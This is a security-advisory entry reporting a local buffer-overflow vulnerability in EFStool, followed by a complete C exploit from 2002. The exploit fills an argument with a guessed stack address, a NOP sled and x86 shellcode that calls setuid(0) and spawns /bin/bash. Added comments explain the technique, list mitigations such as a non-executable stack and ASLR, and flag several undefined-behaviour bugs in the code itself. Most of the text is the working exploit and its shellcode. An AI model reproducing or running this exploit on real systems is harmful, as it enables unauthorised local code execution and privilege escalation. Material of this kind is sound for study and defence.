EFStool has been found to contain a security vulnerability that allows local attackers to make it execute arbitrary code. The vulnerability can be tested for with the following exploit code. Note that EFStool is not installed setuid by default on the major Linux distributions, so the code runs only with the invoking user's privileges there.
Credit:
The information has been provided by Cloudass.
Exploit:
/* efstool.c - efstool/bof simple overflow in efstool,
*
*
* This code is published property of CloudAss, you may
* duplicate this in any shape or form without prior written
* permission from CloudAss.
*
* Bug discovered by ntfx, just figured I'd code a decent
* exploit for it.
*
*
* DISCLAIMER - I am in no way affiliated with ntfx or any members of
* soldierx or legion2002 security.
*
* Usage: ./efsroot offset - bruteforce if necessary
*
* Bug is pretty stupid, and simple, I have yet to see it give root.
* efstool is not +s on slackware 8.0 , it should spawn a shell
* regardless.
*
* (C) COPYRIGHT CloudAss , 2002
* all rights reserved
***********************************************************************
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define SIZE 3000                        /* length of the argument built in main(); must stay a multiple of 4 for the fill loop */
#define NOP 0x90                         /* x86 single-byte `nop`; used as padding before the payload */
#define PATH "/opt/gnome/bin/efstool"    /* absolute path of the target binary passed to execl() */
//--------------------------------------------------
/* Return the current stack pointer (GNU inline asm, x86 only).
 * There is no C `return`; the value is left in %eax and the caller
 * relies on that being the return register, so this is compiler- and
 * ABI-dependent (on a 64-bit build only the low 32 bits are copied). */
long get_esp(void){ __asm__("movl %esp,%eax\n");}
//--------------------------------------------------
/* Payload copied into the argument buffer by main().
 * 32-bit Linux x86 machine code using `int 0x80` system calls; the
 * trailing "/bin/bash" is the program name the payload references.
 * The strlen() calls in main() treat this array as a C string, so a
 * zero byte anywhere in it would silently shorten the copy. */
char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/bash";
/*
 * Entry point. Builds a SIZE-byte argument consisting of a repeated
 * guessed stack address, then a run of NOP bytes followed by the payload,
 * and passes that buffer as the single argument of PATH via execl().
 *
 * argv[1]: decimal offset added to the current stack pointer to form the
 *          guessed address. It is read with atoi() and never validated.
 *
 * Defender notes, from the code alone (not verified here): the technique
 * depends on an executable stack and a predictable stack address, so a
 * non-executable stack, ASLR or a stack protector would be expected to
 * stop it; and because the target is not setuid on the systems the author
 * describes, a successful run yields only the invoking user's privileges.
 */
int main(int argc, char *argv[]) {
char buffer[SIZE];
long retaddr, offset;
int i;
/* argc is never checked: with no argument argv[1] is NULL and atoi()
 * dereferences it (undefined behaviour). atoi() also reports no errors. */
offset = atoi(argv[1]);
retaddr = get_esp() + offset;
/* Fill the whole buffer with the guessed address, 4 bytes per store.
 * Assumes sizeof(long) == 4 (32-bit x86). On an LP64 build each store is
 * 8 bytes, so the final iteration (i == 2996) writes past the end of
 * buffer; the type-punning store also violates strict aliasing. */
for(i=0; i < SIZE; i+=4)
*(long *)&buffer[i] = retaddr;
/* Overwrite the first strlen(shellcode) bytes with NOPs. strlen() is
 * re-evaluated on every iteration and `int i` is compared against a
 * size_t, so i is promoted to unsigned here. */
for(i=0; i < strlen(shellcode); i++)
*(buffer+i) = NOP;
/* Copy the payload immediately after the NOP run (i == strlen(shellcode)).
 * buffer is never NUL-terminated, so execl() reads it as a string up to
 * the first zero byte, which may fall inside a retaddr copy or beyond the
 * end of the array. */
memcpy(buffer+i, shellcode, strlen(shellcode));
/* execl() is called without <unistd.h> (implicit declaration), and its
 * variadic list is terminated with the int 12 instead of the null pointer
 * the API requires — both undefined behaviour. Nothing checks the return
 * value, so an exec failure falls through to `return 0`. */
execl(PATH, "efstool", buffer, 12);
return 0;
}